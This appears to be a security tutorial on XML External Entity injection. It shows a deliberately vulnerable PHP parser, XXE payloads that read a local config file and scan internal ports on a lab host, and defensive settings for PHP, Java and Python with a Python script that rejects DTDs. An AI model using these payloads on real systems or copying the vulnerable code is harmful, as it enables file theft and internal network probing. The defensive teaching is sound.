XXE Vulnerability
XXE stands for XML External Entity injection. An XXE vulnerability occurs when an application parses XML input without prohibiting the loading of external entities, so a malicious external file can be loaded. The consequences include reading files, command execution, scanning ports on the internal network, attacking internal sites and launching denial-of-service attacks. The trigger point is usually a location where XML files can be uploaded: if the uploaded XML is not filtered, a malicious XML file gets in.
The mechanism resembles a file inclusion vulnerability: the XML file is loaded and it references a configuration file, which achieves the injection.
Code containing the vulnerability:
<?php
// Takes an XML file path or URL from the query string and parses it.
// External entities are expanded, so a DOCTYPE in that file is honoured.
$xml = $_GET['x'];
$data = simplexml_load_file($xml);
var_dump($data);
?>
simplexml_load_file() resolves external entities in PHP versions below 5.5.38.
Reading arbitrary files
The contents of file.xml are as follows:
<?xml version = "1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY file SYSTEM "file:///c:/config.ini">
]>
<x>&file;</x>
<!-- reference the external entity -->
Access http://192.168.80.128/test/xml/test.php?x=file.xml
Port scanning
The contents of port.xml:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "http://127.0.0.1:80">
]>
<root>
<name>&xxe;</name>
</root>
Access http://192.168.80.128/test/xml/test.php?x=port.xml
If no error is returned, the port is open.
If the entity instead points to a port that is not listening, for example 180, accessing http://192.168.80.128/test/xml/test.php?x=port.xml gives a different response (an error), which is how open and closed ports are told apart.
A CTF challenge
http://web.jarvisoj.com:9882/
- The response is returned in JSON format
- Capture the request with Burp and analyse it
- Try injecting XML into the captured request and resend it
Using XML as a backdoor
PHP dynamically creates an XML file that serves as the backdoor.
Defending against XXE attacks
Use the method the development language provides to disable external entities.
PHP:
libxml_disable_entity_loader(true);
(This function is deprecated since PHP 8.0, because the bundled libxml no longer loads external entities by default.)
Java:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
(On its own this setting does not stop the parser from fetching external entities; additionally disallow DOCTYPE declarations, e.g. dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);)
Python:
from lxml import etree
xmlData = etree.parse(xmlSource, etree.XMLParser(resolve_entities=False))
Filter the XML data submitted by users:
filter the keywords <!DOCTYPE and <!ENTITY, or SYSTEM and PUBLIC.
Do not allow the XML to contain its own DTD definition.
https://www.cnblogs.com/miyeah/p/4526088.html
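The two defences above (a keyword filter on the submitted XML, and a parser that refuses DTDs) can be compared side by side. The following is an added example written for this page, not code from the original post: it uses only Python's standard library (xml.parsers.expat and xml.etree.ElementTree, as a stand-in for the lxml call shown above) and rejects a document at the parser level as soon as a DOCTYPE or ENTITY declaration is seen, before any entity value could be substituted. The sample documents are constructed here; the first two mirror the file.xml and port.xml payloads shown earlier. The example also shows why the plain keyword blacklist is weaker: a harmless document containing the word "system" is rejected by it, while the parser-level check judges the actual XML structure.

```python
import xml.parsers.expat
from xml.etree import ElementTree as ET

# Sample documents, constructed for this example. The first two mirror the
# file.xml / port.xml payloads from the post.
XXE_FILE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY file SYSTEM "file:///c:/config.ini">
]>
<x>&file;</x>"""

XXE_PORT = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "http://127.0.0.1:80">
]>
<root><name>&xxe;</name></root>"""

# Internal entity only: no file or network access, but still a DTD.
INTERNAL_ENTITY = b"""<!DOCTYPE x [<!ENTITY a "expanded">]><x>&a;</x>"""

CLEAN = b"""<?xml version="1.0"?><order><item>widget</item></order>"""

# Harmless document that merely contains one of the blacklisted words.
FALSE_POSITIVE = b"""<log>system restarted</log>"""


class DoctypeForbidden(ValueError):
    """Raised when a document declares a DTD, an entity or an external reference."""


def keyword_filter(xml_bytes: bytes) -> bool:
    """The blacklist suggested in the post. Returns True when the document is
    allowed through, False when any DTD keyword appears anywhere in it."""
    text = xml_bytes.decode("utf-8", errors="ignore").upper()
    return not any(k in text for k in ("<!DOCTYPE", "<!ENTITY", "SYSTEM", "PUBLIC"))


def _forbid(*args):
    # Any DTD construct aborts parsing; expat propagates this exception.
    raise DoctypeForbidden("DTD construct not allowed: %r" % (args,))


def safe_parse(xml_bytes: bytes) -> ET.Element:
    """Parse while refusing every DTD. The expat handlers fire during
    tokenisation, so the document is rejected the moment '<!DOCTYPE' or
    '<!ENTITY' is seen, regardless of upper/lower case or declared encoding."""
    p = xml.parsers.expat.ParserCreate()
    p.StartDoctypeDeclHandler = _forbid    # <!DOCTYPE ...>
    p.EntityDeclHandler = _forbid          # <!ENTITY ...>, internal or SYSTEM/PUBLIC
    p.ExternalEntityRefHandler = _forbid   # would be invoked to fetch an external entity
    p.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    p.Parse(xml_bytes, True)
    # The bytes are now known to be DTD-free; build the tree from them.
    return ET.fromstring(xml_bytes)


def is_rejected(xml_bytes: bytes) -> bool:
    """True if the parser-level check refuses the document."""
    try:
        safe_parse(xml_bytes)
    except DoctypeForbidden:
        return True
    return False


if __name__ == "__main__":
    samples = [("file.xml", XXE_FILE), ("port.xml", XXE_PORT),
               ("internal entity", INTERNAL_ENTITY), ("clean", CLEAN),
               ("harmless 'system' text", FALSE_POSITIVE)]
    for name, doc in samples:
        print("%-24s keyword filter: %-8s parser check: %s" % (
            name,
            "pass" if keyword_filter(doc) else "reject",
            "reject" if is_rejected(doc) else "pass"))
```

Running the script shows both payloads from the post refused by both checks, while the document containing the plain word "system" is refused only by the keyword blacklist. A substring filter also depends on the bytes being in the encoding the filter expects, whereas the parser handlers are called on the decoded XML tokens, so the parser-level rejection is the one to rely on; the keyword filter is at most a cheap first pass.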
Introducing an external DTD file
Write the XML injection and access http://192.168.80.128/test/xml/test.php?x=xxe-dtd.xml
The file contents can be read out, reaching the same result as the file-reading example above.